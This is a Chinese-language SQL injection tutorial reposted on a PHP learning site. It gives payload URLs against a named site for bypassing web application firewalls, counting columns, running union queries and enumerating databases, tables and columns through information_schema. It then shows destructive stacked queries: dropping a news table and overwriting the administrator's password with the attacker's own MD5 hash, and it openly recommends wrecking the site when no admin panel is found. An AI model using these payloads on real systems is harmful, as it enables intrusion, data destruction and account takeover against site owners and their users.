来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 以 php 为例引发 SQL 注入失败最主要的原因是什么主要就是 WAF 和手工保护代码,WAF 用于拦截恶意代码,但是 WAF 很好绕过,规则是死的,人是活的。WAF 部署在服务器端,根据预先定义的...
以 php 为例
引发 SQL 注入失败最主要的原因是什么主要就是 WAF 和手工保护代码,WAF 用于拦截恶意代码,但是 WAF 很好绕过,规则是死的,人是活的。WAF 部署在服务器端,根据预先定义的规则对 http 请求进行过滤,继而拦截一些通用的必然 xss 和 sql 攻击。 Order by 语句被拦截? 这个情况很少发生,,但是有时候 WAF 由于某些原因会拦截,不过,我们可以绕过,方法很简单,用 Group by 就可以了。因为不再 WAF 的规则列表里 比如下面这样提示 403 forbidden http://www.8090sec.com/gallery?id=1 order by 100--可以尝试一下 group by http://www.8090sec.com/gallery?id=1 group by 100-- 成功 但是,有可能这个还会被拦截。所以我们使用一条流传不那么广泛的一个语句。那就是 (主查询语句)=(select 1) http://www.8090sec.com/news.php?id=8 and (select * from admins)=(select 1) 可能会返回一个错误,类似 Operand should contain 5 column(s). 这样我们就知道有 5 列了。 然后 union select 就懂了。。 http://www.8090sec.com/news.php?id=-8 union select 1,2,3,4,5--order by 10000 了仍然没有报错? 这里讲一下有时候 order by 可以用,但是到 10000 了还是不报错,与上一节不同的是,上 一节是请求被 WAF 拦截,这里呢,则是因为注入语句有点不同,当我第一次遇到的时候, 我天真的以为数据库表里真的有 10000 列。答案很简单,order by 1000000 还是不报错,是 因为我们的注入语句没有运行。 http://www.8090sec.com/news.php?id=9 order by 10000000000-- 不报错 我们稍微改变一下 url ,在 id 后面加一个单引号,并且在最后加一个加号。 http://www.8090sec.com/news.php?id=9' order by 10000000--+ 报错 然后开始使用 union 查询就行了,方法一样。 http://www.8090sec.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+ 从其他数据库里获取数据 有时候我们注入成功了,但是读出来的表都是些新闻啊,相册啊,文章啊,之类的,我们要 找的可是管理,登录表啊。这时候我们就需要看一下是不是还有其他的数据库。 首先获取所有的数据库名: http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata 然后获得指定数据库的表: http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema= (这里填写数据库 hex 编码) 然后获取所有列: http://www.8090sec.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=(这里填写数据库 hex 编码) and table_name=(这里填写表名的 hex 编码) 通过 SQL 注入可以修改数据库里的信息吗? SQL 可以查询,更新,插入信息,所以,查询信息只是其中的一个功能,有时候无法破解 管理员帐号的 MD5 值。那么为什么不自己加一个呢..insert 插入语句就可以,如果找不到 后台,邪恶一点,干脆直接 drop 掉整个表,这样,管理员也登陆不上了。网站也坏了。还 可以通过 update 更新语句来修改管理员密码, http://www.8090sec.com/news.php?id=1 假设这里存在注入。 我们通过 union 获取了一些表名,比如有个 news,那么我们通过下面这个语句删除 news 表。 http://www.8090sec.com/news.php?id=1; DROP TABLE news 然后网站所有的新闻内容就没了,如果要该更改管理员密码,那么这样: http://www.8090sec.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = '你自己的 md5' WHERE login_name='admin'-- |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com